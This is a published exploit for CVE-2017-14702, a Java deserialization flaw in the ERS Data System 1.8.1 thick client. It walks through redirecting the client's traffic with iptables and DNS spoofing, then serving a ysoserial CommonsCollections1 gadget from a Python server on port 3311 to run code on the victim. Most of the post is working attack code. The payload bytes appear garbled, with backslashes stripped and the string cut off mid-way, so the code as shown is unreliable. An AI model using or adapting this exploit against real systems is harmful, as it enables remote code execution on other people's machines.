ERS Data System 1.8.1 Java Deserialization
Posted on 05 October 2017
# Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability # Google Dork: N/A # Date: 9/21/2017 # Exploit Author: West Shepherd # Vendor Homepage: http://www.ersdata.com # Software Link: www.ersdata.com/downloads/ErsSetup.exe # Version: 1.8.1.0 # Tested on: Windows 7 x86 # CVE : CVE-2017-14702 # Description: # ERS Data System 1.8.1.0 allows remote attackers to execute arbitrary code, related to the use of # com.branaghgroup.ecers.update.UpdateRequest deserialization. # Exploitaiton: # The ERS Data System thick client connects to the www.ersdata.com API via an unencrypted HTTP connection on TCP port 3311. # To redirect requests from the thick client to the attacking machine, enable packet forwarding: #!/bin/bash #echo 1 > /proc/sys/net/ipv4/ip_forward #iptables -F INPUT #iptables -F FORWARD #iptables -F OUTPUT #iptables -F -t nat #iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT #iptables -t nat -A POSTROUTING -s 192.168.85.0/24 ! -d 192.168.85.0/24 -j MASQUERADE #iptables -P INPUT ACCEPT #iptables -P FORWARD ACCEPT #iptables -P OUTPUT ACCEPT # Then poison DNS requests to the www.ersdata.com domain: # DNS Spoof https://github.com/devleoper/arp-dns-spoof # root@kali:/usr/share/arp-dns-spoof# cat dns_packet_spoof.py | egrep "domain =|localIP =" # domain = 'www.ersdata.com' # domain to be spoofed # localIP = '192.168.85.131' # IP address for poisoned hosts. # Run the request handler on the attacking machine, which will answer all requests with malicous serialized gadgets. For example: #!/usr/bin/python import SocketServer, sys from SimpleHTTPServer import SimpleHTTPRequestHandler # POST Handler class HTTPHandler(SimpleHTTPRequestHandler): def __init__(self,req,client_addr,server): SimpleHTTPRequestHandler.__init__(self,req,client_addr,server) def do_POST(self): # java -jar ysoserial-master-v0.0.5-g1f2e7bf-14.jar CommonsCollections1 calc.exe > calc.bin # python -c 'import binascii, re;print "\x"+"\x".join(re.findall("..",binascii.hexlify(open("calc.bin","rb").read())))' response = ( "xacxedx00x05x73x72x00x32x73x75x6ex2ex72x65x66x6cx65x63x74x2ex61x6ex6ex6fx74x61x74x69x6fx6ex2ex41x6ex6ex6fx74x61x74x69x6fx6ex49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x55xcaxf5x0fx15xcbx7exa5x02x00x02x4cx00x0cx6dx65x6dx62x65x72x56x61x6cx75x65x73x74x00x0fx4cx6ax61x76x61x2fx75x74x69x6cx2fx4dx61x70x3bx4cx00x04x74x79x70x65x74x00x11x4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx78x70x73x7dx00x00x00x01x00x0dx6ax61x76x61x2ex75x74x69x6cx2ex4dx61x70x78x72x00x17x6ax61x76x61x2ex6cx61x6ex67x2ex72x65x66x6cx65x63x74x2ex50x72x6fx78x79xe1x27xdax20xccx10x43xcbx02x00x01x4cx00x01x68x74x00x25x4cx6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x3bx78x70x73x71x00x7ex00x00x73x72x00x2ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex6dx61x70x2ex4cx61x7ax79x4dx61x70x6exe5x94x82x9ex79x10x94x03x00x01x4cx00x07x66x61x63x74x6fx72x79x74x00x2cx4cx6fx72x67x2fx61x70x61x63x68x65x2fx63x6fx6dx6dx6fx6ex73x2fx63x6fx6cx6cx65x63x74x69x6fx6ex73x2fx54x72x61x6ex73x66x6fx72x6dx65x72x3bx78x70x73x72x00x3ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex43x68x61x69x6ex65x64x54x72x61x6ex73x66x6fx72x6dx65x72x30xc7x97xecx28x7ax97x04x02x00x01x5bx00x0dx69x54x72x61x6ex73x66x6fx72x6dx65x72x73x74x00x2dx5bx4cx6fx72x67x2fx61x70x61x63x68x65x2fx63x6fx6dx6dx6fx6ex73x2fx63x6fx6cx6cx65x63x74x69x6fx6ex73x2fx54x72x61x6ex73x66x6fx72x6dx65x72x3bx78x70x75x72x00x2dx5bx4cx6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex54x72x61x6ex73x66x6fx72x6dx65x72x3bxbdx56x2axf1xd8x34x18x99x02x00x00x78x70x00x00x00x05x73x72x00x3bx6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex43x6fx6ex73x74x61x6ex74x54x72x61x6ex73x66x6fx72x6dx65x72x58x76x90x11x41x02xb1x94x02x00x01x4cx00x09x69x43x6fx6ex73x74x61x6ex74x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx78x70x76x72x00x11x6ax61x76x61x2ex6cx61x6ex67x2ex52x75x6ex74x69x6dx65x00x00x00x00x00x00x00x00x00x00x00x78x70x73x72x00x3ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex49x6ex76x6fx6bx65x72x54x72x61x6ex73x66x6fx72x6dx65x72x87xe8xffx6bx7bx7cxcex38x02x00x03x5bx00x05x69x41x72x67x73x74x00x13x5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx4cx00x0bx69x4dx65x74x68x6fx64x4ex61x6dx65x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx5bx00x0bx69x50x61x72x61x6dx54x79x70x65x73x74x00x12x5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx78x70x75x72x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90xcex58x9fx10x73x29x6cx02x00x00x78x70x00x00x00x02x74x00x0ax67x65x74x52x75x6ex74x69x6dx65x75x72x00x12x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex43x6cx61x73x73x3bxabx16xd7xaexcbxcdx5ax99x02x00x00x78x70x00x00x00x00x74x00x09x67x65x74x4dx65x74x68x6fx64x75x71x00x7ex00x1ex00x00x00x02x76x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67xa0xf0x ) self.send_response(200) self.send_header("Content-type", "text/html") self.send_header("Content-length", len(response)) self.end_headers() self.wfile.write(response) try: httpd = SocketServer.TCPServer(("", 3311), HTTPHandler) print "Serving at port: ", 3311 httpd.serve_forever() except: print "Exiting..."
